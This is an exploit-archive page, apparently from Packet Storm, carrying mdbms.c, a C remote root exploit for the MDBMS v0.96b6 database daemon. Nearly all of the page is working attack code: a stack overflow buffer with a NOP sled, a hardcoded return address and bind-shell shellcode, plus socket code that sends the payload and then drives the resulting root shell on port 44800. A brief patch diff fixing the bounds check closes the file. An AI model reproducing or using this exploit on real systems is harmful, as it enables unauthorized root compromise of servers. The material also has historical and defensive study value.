what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mdbms.c

mdbms.c
Posted Jun 1, 2000
Authored by TDP

MDBMS V0.96b6 remote root exploit - This code demonstrates a MDBMS v0.96b6 vulnerability which allows any remote user to exec a root shell. Tested on Linux SuSE 6.3.

tags | exploit, remote, shell, root
systems | linux, suse
SHA-256 | de6ae98a613246fac73e111c7f8a950caf984cf19ee3796d0a0406e994e6fd8a

mdbms.c

Change Mirror Download
/*                     MDBMS V0.96b6 remote shell xploit 
* 11/05/2000 |[TDP]| <tdp@psynet.net> - HaCk-13 TeaM
*
* This code shows a MDBMS v0.96b6 vulnerability in which, any remote
* user can exec a shell. MDBMS daemon used to be ran as root user; exposing
* the system to serious vulnerability risks, because any attacker can obtain
* root priviledges remotely with this exploit
*
* Exploit tested on LiNUX SuSE 6.3... previous MDBMS versions may
* be affected by this vulnerability. Fix at end of this doc.
*
* Greetings goes to all other members and all my friends
*
*/



#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>

#define NOP 0x90
#define LEN 10008
#define RET 0xbffff586

/* Special shell code */
char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1"
"\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xaf\x66\x89\x46\x0e\x8d\x46\x0c\x89"
"\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb"
"\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89"
"\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06"
"\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd"
"\x80\xe8\x5b\xff\xff\xff";

long
resolveip (char *name)
{
struct hostent *hp;
long ip;

if ((ip = inet_addr (name)) == -1)
{
if ((hp = gethostbyname (name)) == NULL)
{
fprintf (stderr, "Can't resolve host name [%s].\n", name);
exit (0);
}
memcpy (&ip, (hp->h_addr), 4);
}
return (ip);
}

int
main (int argc, char *argv[])
{
char buffer[LEN], buffer2[LEN + 10];
long retaddr = RET;
long remoteip;
unsigned long sp;
int i, a, shellsock, clisock;
struct sockaddr_in clisin, shsin;
char snd[4096], rcv[4096];
fd_set rset;

fprintf (stderr,
"\nMDBMS v0.96b6 Remote Shell Xploit - <tdp@psynet.net>\n");

if (argc < 2)
{
fprintf (stderr, "Usage: %s ip [offset]\n", argv[0]);
exit (-1);
}

if (argc > 2)
a = atoi (argv[2]);
else
a = 0;

retaddr = retaddr + a;

for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = retaddr;

for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;

memcpy (buffer + i, shellcode, strlen (shellcode));
sprintf (buffer2, "%s\n", buffer);

fprintf (stderr, "Connecting to remote MDBMS server...\n");
fflush (stdout);
remoteip = resolveip (argv[1]);
clisock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (clisock == -1)
{
fprintf (stderr, "Can't create main socket");
exit (-1);
}
clisin.sin_family = AF_INET;
clisin.sin_port = htons (2224);
clisin.sin_addr.s_addr = remoteip;
if (connect (clisock, (struct sockaddr *) &clisin, sizeof (clisin)) == -1)
{
fprintf (stderr, "Can't connect to the MDBMS fastport, trying normal port...\n");
clisin.sin_family = AF_INET;
clisin.sin_port = htons (2223);
clisin.sin_addr.s_addr = remoteip;
if (connect (clisock, (struct sockaddr *) &clisin, sizeof (clisin)) ==
-1)
{
fprintf
(stderr, "Can't connect to normalport... MDBMS is running in remote server?\n\n");
exit (0);
}
exit (0);
}

switch (i = read (clisock, buffer, LEN))
{
case -1:
{
fprintf (stderr, "ClientSocket: unexpected EOF\n");
exit (0);
}
case 0:
{
fprintf (stderr, "ClientSocket: EOF\n");
exit (0);
}
default:
buffer[i] = 0;
fprintf (stderr, "%s\n", buffer);
break;
}
fprintf (stderr, "Sending xploit, jumping to address 0x%lx\n", retaddr);
i = write (clisock, buffer2, strlen (buffer2));
fsync (clisock);
if ((i < 10000) || (i > 10018))
{
fprintf (stderr, "ClientSocket: Error writing xploit\n");
exit (0);
}
close (clisock);

fprintf (stderr, "Waiting 2 secs for hell...\n");
sleep (2);
/* shell stuFF */
fprintf (stderr, "Connecting to the shell...\n");
fflush (stdout);

memset (&shsin, 0, sizeof (shsin));
shsin.sin_family = AF_INET;
shsin.sin_port = htons (44800);
shsin.sin_addr.s_addr = remoteip;

if ((shellsock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
fprintf (stderr, "Can't create shell socket\n");
exit (-1);
}

if (connect (shellsock, (struct sockaddr *) &shsin, sizeof (shsin)) < 0)
{
fprintf (stderr, "Can't connect to the shell\n\n");
exit (0);
}

fprintf (stderr, "Connected\n");

while (1)
{
FD_ZERO (&rset);
FD_SET (fileno (stdin), &rset);
FD_SET (shellsock, &rset);
select (255, &rset, NULL, NULL, NULL);
if (FD_ISSET (fileno (stdin), &rset))
{
memset (snd, 0, sizeof (snd));
fgets (snd, sizeof (snd), stdin);
write (shellsock, snd, strlen (snd));
}
if (FD_ISSET (shellsock, &rset))
{
memset (rcv, 0, sizeof (rcv));
if (read (shellsock, rcv, sizeof (rcv)) <= 0)
exit (0);
fputs (rcv, stdout);
}
}

return (0);
}


/* FIX --- mdbmsfix.diff -------- cut here -----------

*** mdbms-0.99/include/interface.hh Sun Sep 21 13:48:21 1997
--- mdbms-0.99-fixed/include/interface.hh Wed May 12 01:00:55 2000
*************** class user
*** 71,73 ****
void unload();
! int nextline(char *, char *);
void uprintf(char *, ...);
--- 71,73 ----
void unload();
! int nextline(char *, char *, int);
void uprintf(char *, ...);
*** mdbms-0.99/mdbms/interface.cc Sat Nov 8 12:12:31 1997
--- mdbms-0.99-fixed/mdbms/interface.cc Wed May 12 01:00:10 2000
*************** void user::input()
*** 223,225 ****
}
! int user::nextline(char *source, char *dest)
{
--- 223,225 ----
}
! int user::nextline(char *source, char *dest, int limit)
{
*************** int user::nextline(char *source, char *d
*** 227,228 ****
--- 227,231 ----
if (!where) return -1;
+ // Sec Fix - |[TDP]| <tdp@psynet.net> //
+ if ((where-source)>limit)
+ return(-1);
*(where++)='\0';
*************** void user::run()
*** 263,265 ****
if (blocked) return;
! while (nextline(inbuf,buf)!=-1)
{
--- 266,268 ----
if (blocked) return;
! while (nextline(inbuf,buf,sizeof(buf))!=-1)
{

--------------------- cuthere -----------------------*/

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close